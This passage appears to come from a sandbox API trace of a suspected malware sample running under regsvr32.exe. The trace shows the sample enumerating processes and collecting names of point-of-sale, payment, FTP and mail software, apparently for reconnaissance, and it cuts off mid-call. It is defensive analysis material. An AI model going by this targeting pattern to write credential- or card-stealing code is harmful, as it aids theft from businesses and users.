th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0117.491] GetCurrentProcessId () returned 0xde0 [0117.491] GetProcessHeap () returned 0x500000 [0117.492] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x5ef180 [0117.492] lstrcpyW (in: lpString1=0x5ef188, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0117.492] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0117.493] GetCurrentProcessId () returned 0xde0 [0117.493] GetProcessHeap () returned 0x500000 [0117.493] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x5f0c80 [0117.493] lstrcpyW (in: lpString1=0x5f0c88, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0117.493] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0117.494] GetCurrentProcessId () returned 0xde0 [0117.494] GetProcessHeap () returned 0x500000 [0117.494] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x5f0ec0 [0117.494] lstrcpyW (in: lpString1=0x5f0ec8, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0117.494] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0117.495] GetCurrentProcessId () returned 0xde0 [0117.495] GetProcessHeap () returned 0x500000 [0117.495] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x5eeac0 [0117.495] lstrcpyW (in: lpString1=0x5eeac8, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0117.495] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1050, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="answerelectionthroughout.exe")) returned 1 [0117.496] GetCurrentProcessId () returned 0xde0 [0117.496] GetProcessHeap () returned 0x500000 [0117.496] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x5f0380 [0117.496] lstrcpyW (in: lpString1=0x5f0388, lpString2="answerelectionthroughout.exe" | out: lpString1="answerelectionthroughout.exe") returned="answerelectionthroughout.exe" [0117.496] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x66c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0117.497] GetCurrentProcessId () returned 0xde0 [0117.497] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x270, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0117.498] GetCurrentProcessId () returned 0xde0 [0117.498] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x12ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x354, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0117.499] GetCurrentProcessId () returned 0xde0 [0117.499] GetProcessHeap () returned 0x500000 [0117.499] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x5f05c0 [0117.499] lstrcpyW (in: lpString1=0x5f05c8, lpString2="msfeedssync.exe" | out: lpString1="msfeedssync.exe") returned="msfeedssync.exe" [0117.499] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x13fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x38c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0117.500] GetCurrentProcessId () returned 0xde0 [0117.500] GetProcessHeap () returned 0x500000 [0117.500] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x5eff00 [0117.500] lstrcpyW (in: lpString1=0x5eff08, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0117.500] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0xb54, pcPriClassBase=8, dwFlags=0x0, szExeFile="regsvr32.exe")) returned 1 [0117.501] GetCurrentProcessId () returned 0xde0 [0117.501] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0xb54, pcPriClassBase=8, dwFlags=0x0, szExeFile="regsvr32.exe")) returned 0 [0117.502] CloseHandle (hObject=0x61c) returned 1 [0117.502] lstrlenW (lpString="audiodg.exe") returned 11 [0117.502] lstrlenW (lpString="msfeedssync.exe") returned 15 [0117.502] lstrlenW (lpString="answerelectionthroughout.exe") returned 28 [0117.502] lstrlenW (lpString="utg2.exe") returned 8 [0117.502] lstrlenW (lpString="spgagentservice.exe") returned 19 [0117.502] lstrlenW (lpString="spcwin.exe") returned 10 [0117.502] lstrlenW (lpString="omnipos.exe") returned 11 [0117.502] lstrlenW (lpString="mxslipstream.exe") returned 16 [0117.502] lstrlenW (lpString="isspos.exe") returned 10 [0117.502] lstrlenW (lpString="fpos.exe") returned 8 [0117.502] lstrlenW (lpString="edcsvr.exe") returned 10 [0117.502] lstrlenW (lpString="creditservice.exe") returned 17 [0117.502] lstrlenW (lpString="centralcreditcard.exe") returned 21 [0117.502] lstrlenW (lpString="ccv_server.exe") returned 14 [0117.503] lstrlenW (lpString="aldelo.exe") returned 10 [0117.503] lstrlenW (lpString="afr38.exe") returned 9 [0117.503] lstrlenW (lpString="accupos.exe") returned 11 [0117.503] lstrlenW (lpString="active-charge.exe") returned 17 [0117.503] lstrlenW (lpString="yahoomessenger.exe") returned 18 [0117.503] lstrlenW (lpString="winscp.exe") returned 10 [0117.503] lstrlenW (lpString="whatsapp.exe") returned 12 [0117.503] lstrlenW (lpString="webdrive.exe") returned 12 [0117.503] lstrlenW (lpString="trillian.exe") returned 12 [0117.503] lstrlenW (lpString="thunderbird.exe") returned 15 [0117.503] lstrlenW (lpString="smartftp.exe") returned 12 [0117.503] lstrlenW (lpString="skype.exe") returned 9 [0117.503] lstrlenW (lpString="scriptftp.exe") returned 13 [0117.503] lstrlenW (lpString="pidgin.exe") returned 10 [0117.503] lstrlenW (lpString="outlook.exe") returned 11 [0117.503] lstrlenW (lpString="operamail.exe") returned 13 [0117.503] lstrlenW (lpString="notepad.exe") returned 11 [0117.503] lstrlenW (lpString="ncftp.exe") returned 9 [0117.503] lstrlenW (lpString="leechftp.exe") returned 12 [0117.503] lstrlenW (lpString="icq.exe") returned 7 [0117.503] lstrlenW (lpString="gmailnotifierpro.exe") returned 20 [0117.503] lstrlenW (lpString="foxmailincmail.exe") returned 18 [0117.503] lstrlenW (lpString="fling.exe") returned 9 [0117.503] lstrlenW (lpString="flashfxp.exe") returned 12 [0117.503] lstrlenW (lpString="filezilla.exe") returned 13 [0117.503] lstrlenW (lpString="far.exe") returned 7 [0117.503] lstrlenW (lpString="coreftp.exe") returned 11 [0117.503] lstrlenW (lpString="bitkinex.exe") returned 12 [0117.503] lstrlenW (lpString="barca.exe") returned 9 [0117.503] lstrlenW (lpString="alftp.exe") returned 9 [0117.503] lstrlenW (lpString="absolutetelnet.exe") returned 18 [0117.503] lstrlenW (lpString="3dftp.exe") returned 9 [0117.503] lstrlenW (lpString="though.exe") returned 10 [0117.503] lstrlenW (lpString="body.exe") returned 8 [0117.503] lstrlenW (lpString="project.exe") returned 11 [0117.503] lstrlenW (lpString="pressure_former.exe") returned 19 [0117.503] lstrlenW (lpString="coach_wait_small.exe") returned 20 [0117.503] lstrlenW (lpString="military.exe") returned 12 [0117.503] lstrlenW (lpString="various.exe") returned 11 [0117.503] lstrlenW (lpString="amount-bad.exe") returned 14 [0117.504] lstrlenW (lpString="containhowever.exe") returned 18 [0117.504] lstrlenW (lpString="newspapertrypositive.exe") returned 24 [0117.504] lstrlenW (lpString="addressseasonlow.exe") returned 20 [0117.504] lstrlenW (lpString="religious-wonder-win.exe") returned 24 [0117.504] lstrlenW (lpString="focus_wear.exe") returned 14 [0117.504] lstrlenW (lpString="period.exe") returned 10 [0117.504] lstrlenW (lpString="education process memory.exe") returned 28 [0117.504] lstrlenW (lpString="away.exe") returned 8 [0117.504] lstrlenW (lpString="my-technology.exe") returned 17 [0117.504] lstrlenW (lpString="beatdeal.exe") returned 12 [0117.504] lstrlenW (lpString="structure_indeed.exe") returned 20 [0117.504] lstrlenW (lpString="employee.exe") returned 12 [0117.504] lstrlenW (lpString="iexplore.exe") returned 12 [0117.504] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0117.504] lstrlenW (lpString="backgroundTaskHost.exe") returned 22 [0117.504] lstrlenW (lpString="sppsvc.exe") returned 10 [0117.504] lstrlenW (lpString="WMIADAP.exe") returned 11 [0117.504] lstrlenW (lpString="SearchUI.exe") returned 12 [0117.504] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0117.504] lstrlenW (lpString="explorer.exe") returned 12 [0117.504] lstrlenW (lpString="taskhostw.exe") returned 13 [0117.504] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0117.504] lstrlenW (lpString="sihost.exe") returned 10 [0117.504] lstrlenW (lpString="spoolsv.exe") returned 11 [0117.504] lstrlenW (lpString="dwm.exe") returned 7 [0117.504] lstrlenW (lpString="svchost.exe") returned 11 [0117.504] lstrlenW (lpString="lsass.exe") returned 9 [0117.504] lstrlenW (lpString="services.exe") returned 12 [0117.504] lstrlenW (lpString="winlogon.exe") returned 12 [0117.504] lstrlenW (lpString="wininit.exe") returned 11 [0117.504] lstrlenW (lpString="csrss.exe") returned 9 [0117.504] lstrlenW (lpString="smss.exe") returned 8 [0117.504] GetProcessHeap () returned 0x500000 [0117.504] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x988) returned 0x5cff90 [0117.504] lstrcpyW (in: lpString1=0x5cff90, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0117.504] lstrlenW (lpString="audiodg.exe") returned 11 [0117.504] lstrcpyW (in: lpString1=0x5cffa8, lpString2="msfeedssync.exe" | out: lpString1="msfeedssync.exe") returned="msfeedssync.exe" [0117.505] lstrlenW (lpString="msfeedssync.exe") returned 15 [0117.505] lstrcpyW (in: lpString1=0x5cffc8, lpString2="answerelectionthroughout.exe" | out: lpString1="answerelectionthroughout.exe") returned="answerelectionthroughout.exe" [0117.505] lstrlenW (lpString="answerelectionthroughout.exe") returned 28 [0117.505] lstrcpyW (in: lpString1=0x5d0002, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0117.505] lstrlenW (lpString="utg2.exe") returned 8 [0117.505] lstrcpyW (in: lpString1=0x5d0014, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0117.505] lstrlenW (lpString="spgagentservice.exe") returned 19 [0117.505] lstrcpyW (in: lpString1=0x5d003c, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0117.505] lstrlenW (lpString="spcwin.exe") returned 10 [0117.505] lstrcpyW (in: lpString1=0x5d0052, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0117.505] lstrlenW (lpString="omnipos.exe") returned 11 [0117.505] lstrcpyW (in: lpString1=0x5d006a, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0117.505] lstrlenW (lpString="mxslipstream.exe") returned 16 [0117.505] lstrcpyW (in: lpString1=0x5d008c, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0117.505] lstrlenW (lpString="isspos.exe") returned 10 [0117.505] lstrcpyW (in: lpString1=0x5d00a2, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0117.505] lstrlenW (lpString="fpos.exe") returned 8 [0117.505] lstrcpyW (in: lpString1=0x5d00b4, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0117.505] lstrlenW (lpString="edcsvr.exe") returned 10 [0117.505] lstrcpyW (in: lpString1=0x5d00ca, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0117.505] lstrlenW (lpString="creditservice.exe") returned 17 [0117.505] lstrcpyW (in: lpString1=0x5d00ee, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0117.505] lstrlenW (lpString="centralcreditcard.exe") returned 21 [0117.505] lstrcpyW (in: lpString1=0x5d011a, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0117.505] lstrlenW (lpString="ccv_server.exe") returned 14 [0117.505] lstrcpyW (in: lpString1=0x5d0138, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0117.505] lstrlenW (lpString="aldelo.exe") returned 10 [0117.505] lstrcpyW (in: lpString1=0x5d014e, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0117.505] lstrlenW (lpString="afr38.exe") returned 9 [0117.505] lstrcpyW (in: lpString1=0x5d0162, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0117.505] lstrlenW (lpString="accupos.exe") returned 11 [0117.505] lstrcpyW (in: lpString1=0x5d017a, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0117.505] lstrlenW (lpString="active-charge.exe") returned 17 [0117.505] lstrcpyW (in: lpString1=0x5d019e, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0117.505] lstrlenW (lpString="yahoomessenger.exe") returned 18 [0117.505] lstrcpyW (in: lpString1=0x5d01c4, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0117.506] lstrlenW (lpString="winscp.exe") returned 10 [0117.506] lstrcpyW (in: lpString1=0x5d01da, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0117.506] lstrlenW (lpString="whatsapp.exe") returned 12 [0117.506] lstrcpyW (in: lpString1=0x5d01f4, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0117.506] lstrlenW (lpString="webdrive.exe") returned 12 [0117.506] lstrcpyW (in: lpString1=0x5d020e, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0117.506] lstrlenW (lpString="trillian.exe") returned 12 [0117.506] lstrcpyW (in: lpString1=0x5d0228, lpString2="thunderbird.exe" | out: lpString1="thunderbird.exe") returned="thunderbird.exe" [0117.506] lstrlenW (lpString="thunderbird.exe") returned 15 [0117.506] lstrcpyW (in: lpString1=0x5d0248, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0117.506] lstrlenW (lpString="smartftp.exe") returned 12 [0117.506] lstrcpyW (in: lpString1=0x5d0262, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0117.506] lstrlenW (lpString="skype.exe") returned 9 [0117.506] lstrcpyW (in: lpString1=0x5d0276, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0117.506] lstrlenW (lpString="scriptftp.exe") returned 13 [0117.506] lstrcpyW (in: lpString1=0x5d0292, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0117.506] lstrlenW (lpString="pidgin.exe") returned 10 [0117.506] lstrcpyW (in: lpString1=0x5d02a8, lpString2="outlook.exe" | out: lpString1="outlook.exe") returned="outlook.exe" [0117.506] lstrlenW (lpString="outlook.exe") returned 11 [0117.506] lstrcpyW (in: lpString1=0x5d02c0, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0117.506] lstrlenW (lpString="operamail.exe") returned 13 [0117.506] lstrcpyW (in: lpString1=0x5d02dc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0117.506] lstrlenW (lpString="notepad.exe") returned 11 [0117.506] lstrcpyW (in: lpString1=0x5d02f4, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0117.506] lstrlenW (lpString="ncftp.exe") returned 9 [0117.506] lstrcpyW (in: lpString1=0x5d0308, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0117.506] lstrlenW (lpString="leechftp.exe") returned 12 [0117.506] lstrcpyW (in: lpString1=0x5d0322, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0117.506] lstrlenW (lpString="icq.exe") returned 7 [0117.506] lstrcpyW (in: lpString1=0x5d0332, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0117.506] lstrlenW (lpString="gmailnotifierpro.exe") returned 20 [0117.506] lstrcpyW (in: lpString1=0x5d035c, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0117.506] lstrlenW (lpString="foxmailincmail.exe") returned 18 [0117.506] lstrcpyW (in: lpString1=0x5d0382, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0117.506] lstrlenW (lpString="fling.exe") returned 9 [0117.506] lstrcpyW (in: lpString1=0x5d0396, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0117.507] lstrlenW (lpString="flashfxp.exe") returned 12 [0117.507] lstrcpyW (in: lpString1=0x5d03b0, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0117.507] lstrlenW (lpString="filezilla.exe") returned 13 [0117.507] lstrcpyW (in: lpString1=0x5d03cc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0117.507] lstrlenW (lpString="far.exe") returned 7 [0117.507] lstrcpyW (in: lpString1=0x5d03dc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0117.507] lstrlenW (lpString="coreftp.exe") returned 11 [0117.507] lstrcpyW (in: lpString1=0x5d03f4, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0117.507] lstrlenW (lpString="bitkinex.exe") returned 12 [0117.507] lstrcpyW (in: lpString1=0x5d040e, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0117.507] lstrlenW (lpString="barca.exe") returned 9 [0117.507] lstrcpyW (in: lpString1=0x5d0422, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0117.507] lstrlenW (lpString="alftp.exe") returned 9 [0117.507] lstrcpyW (in: lpString1=0x5d0436, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0117.507] lstrlenW (lpString="absolutetelnet.exe") returned 18 [0117.507] lstrcpyW (in: lpString1=0x5d045c, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0117.507] lstrlenW (lpString="3dftp.exe") returned 9 [0117.507] lstrcpyW (in: lpString1=0x5d0470, lpString2="though.exe" | out: lpString1="though.exe") returned="though.exe" [0117.507] lstrlenW (lpString="though.exe") returned 10 [0117.507] lstrcpyW (in: lpString1=0x5d0486, lpString2="body.exe" | out: lpString1="body.exe") returned="body.exe" [0117.507] lstrlenW (lpString="body.exe") returned 8 [0117.507] lstrcpyW (in: lpString1=0x5d0498, lpString2="project.exe" | out: lpString1="project.exe") returned="project.exe" [0117.507] lstrlenW (lpString="project.exe") returned 11 [0117.507] lstrcpyW (in: lpString1=0x5d04b0, lpString2="pressure_former.exe" | out: lpString1="pressure_former.exe") returned="pressure_former.exe" [0117.507] lstrlenW (lpString="pressure_former.exe") returned 19 [0117.508] lstrcpyW (in: lpString1=0x5d04d8, lpString2="coach_wait_small.exe" | out: lpString1="coach_wait_small.exe") returned="coach_wait_small.exe" [0117.508] lstrlenW (lpString="coach_wait_small.exe") returned 20 [0117.508] lstrcpyW (in: lpString1=0x5d0502, lpString2="military.exe" | out: lpString1="military.exe") returned="military.exe" [0117.508] lstrlenW (lpString="military.exe") returned 12 [0117.508] lstrcpyW (in: lpString1=0x5d051c, lpString2="various.exe" | out: lpString1="various.exe") returned="various.exe" [0117.508] lstrlenW (lpString="various.exe") returned 11 [0117.508] lstrcpyW (in: lpString1=0x5d0534, lpString2="amount-bad.exe" | out: lpString1="amount-bad.exe") returned="amount-bad.exe" [0117.508] lstrlenW (lpString="amount-bad.exe") returned 14 [0117.508] lstrcpyW (in: lpString1=0x5d0552, lpString2="containhowever.exe" | out: lpString1="containhowever.exe") returned="containhowever.exe" [0117.508] lstrlenW (lpString="containhowever.exe") returned 18 [0117.508] lstrcpyW (in: lpString1=0x5d0578, lpString2="newspapertrypositive.exe" | out: lpString1="newspapertrypositive.exe") returned="newspapertrypositive.exe" [0117.508] lstrlenW (lpString="newspapertrypositive.exe") returned 24 [0117.508] lstrcpyW (in: lpString1=0x5d05aa, lpString2="addressseasonlow.exe" | out: lpString1="addressseasonlow.exe") returned="addressseasonlow.exe" [0117.508] lstrlenW (lpString="addressseasonlow.exe") returned 20 [0117.508] lstrcpyW (in: lpString1=0x5d05d4, lpString2="religious-wonder-win.exe" | out: lpString1="religious-wonder-win.exe") returned="religious-wonder-win.exe" [0117.508] lstrlenW (lpString="religious-wonder-win.exe") returned 24 [0117.508] lstrcpyW (in: lpString1=0x5d0606, lpString2="focus_wear.exe" | out: lpString1="focus_wear.exe") returned="focus_wear.exe" [0117.508] lstrlenW (lpString="focus_wear.exe") returned 14 [0117.508] lstrcpyW (in: lpString1=0x5d0624, lpString2="period.exe" | out: lpString1="period.exe") returned="period.exe" [0117.508] lstrlenW (lpString="period.exe") returned 10 [0117.508] lstrcpyW (in: lpString1=0x5d063a, lpString2="education process memory.exe" | out: lpString1="education process memory.exe") returned="education process memory.exe" [0117.508] lstrlenW (lpString="education process memory.exe") returned 28 [0117.508] lstrcpyW (in: lpString1=0x5d0674, lpString2="away.exe" | out: lpString1="away.exe") returned="away.exe" [0117.508] lstrlenW (lpString="away.exe") returned 8 [0117.508] lstrcpyW (in: lpString1=0x5d0686, lpString2="my-technology.exe" | out: lpString1="my-technology.exe") returned="my-technology.exe" [0117.508] lstrlenW (lpString="my-technology.exe") returned 17 [0117.508] lstrcpyW (in: lpString1=0x5d06aa, lpString2="beatdeal.exe" | out: lpString1="beatdeal.exe") returned="beatdeal.exe" [0117.508] lstrlenW (lpString="beatdeal.exe") returned 12 [0117.508] lstrcpyW (in: lpString1=0x5d06c4, lpString2="structure_indeed.exe" | out: lpString1="structure_indeed.exe") returned="structure_indeed.exe" [0117.508] lstrlenW (lpString="structure_indeed.exe") returned 20 [0117.508] lstrcpyW (in: lpString1=0x5d06ee, lpString2="employee.exe" | out: lpString1="employee.exe") returned="employee.exe" [0117.508] lstrlenW (lpString="employee.exe") returned 12 [0117.508] lstrcpyW (in: lpString1=0x5d0708, lpString2="iexplore.exe" | out: lpString1="iexplore.exe") returned="iexplore.exe" [0117.508] lstrlenW (lpString="iexplore.exe") returned 12 [0117.508] lstrcpyW (in: lpString1=0x5d0722, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0117.508] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0117.509] lstrcpyW (in: lpString1=0x5d073c, lpString2="backgroundTaskHost.exe" | out: lpString1="backgroundTaskHost.exe") returned="backgroundTaskHost.exe" [0117.509] lstrlenW (lpString="backgroundTaskHost.exe") returned 22 [0117.509] lstrcpyW (in: lpString1=0x5d076a, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0117.509] lstrlenW (lpString="sppsvc.exe") returned 10 [0117.509] lstrcpyW (in: lpString1=0x5d0780, lpString2="WMIADAP.exe" | out: lpString1="WMIADAP.exe") returned="WMIADAP.exe" [0117.509] lstrlenW (lpString="WMIADAP.exe") returned 11 [0117.509] lstrcpyW (in: lpString1=0x5d0798, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0117.509] lstrlenW (lpString="SearchUI.exe") returned 12 [0117.509] lstrcpyW (in: lpString1=0x5d07b2, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0117.509] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0117.509] lstrcpyW (in: lpString1=0x5d07e2, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0117.509] lstrlenW (lpString="explorer.exe") returned 12 [0117.509] lstrcpyW (in: lpString1=0x5d07fc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0117.509] lstrlenW (lpString="taskhostw.exe") returned 13 [0117.509] lstrcpyW (in: lpString1=0x5d0818, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0117.509] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0117.509] lstrcpyW (in: lpString1=0x5d083c, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0117.509] lstrlenW (lpString="sihost.exe") returned 10 [0117.509] lstrcpyW (in: lpString1=0x5d0852, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0117.509] lstrlenW (lpString="spoolsv.exe") returned 11 [0117.509] lstrcpyW (in: lpString1=0x5d086a, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0117.509] lstrlenW (lpString="dwm.exe") returned 7 [0117.509] lstrcpyW (in: lpString1=0x5d087a, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0117.509] lstrlenW (lpString="svchost.exe") returned 11 [0117.509] lstrcpyW (in: lpString1=0x5d0892, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0117.509] lstrlenW (lpString="lsass.exe") returned 9 [0117.509] lstrcpyW (in: lpString1=0x5d08a6, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0117.509] lstrlenW (lpString="services.exe") returned 12 [0117.509] lstrcpyW (in: lpString1=0x5d08c0, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0117.509] lstrlenW (lpString="winlogon.exe") returned 12 [0117.509] lstrcpyW (in: lpString1=0x5d08da, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0117.509] lstrlenW (lpString="wininit.exe") returned 11 [0117.509] lstrcpyW (in: lpString1=0x5d08f2, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0117.509] lstrlenW (lpString="csrss.exe") returned 9 [0117.509] lstrcpyW (in: lpString1=0x5d0906, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0117.509] lstrlenW (lpString="smss.exe") returned 8 [0117.510] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 